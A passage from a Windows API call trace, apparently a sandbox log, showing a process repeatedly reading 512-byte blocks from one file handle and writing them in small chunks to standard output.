(_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.106] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.106] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, 
lpOverlapped=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] GetFileType (hFile=0x4c) returned 0x1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] GetFileType (hFile=0x4c) returned 0x1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] GetFileType (hFile=0x4c) returned 0x1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 
| out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] GetFileType (hFile=0x4c) returned 0x1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] GetFileType (hFile=0x4c) returned 0x1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.107] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.107] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0107.108] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] GetFileType (hFile=0x4c) returned 0x1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.109] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.109] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.109] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] GetFileType (hFile=0x4c) returned 0x1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] GetFileType (hFile=0x4c) returned 0x1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] GetFileType (hFile=0x4c) returned 0x1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] GetFileType (hFile=0x4c) returned 0x1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 
[0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.110] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.110] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, 
lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.112] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.112] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType 
(hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.113] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.113] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, 
lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.114] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.114] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: 
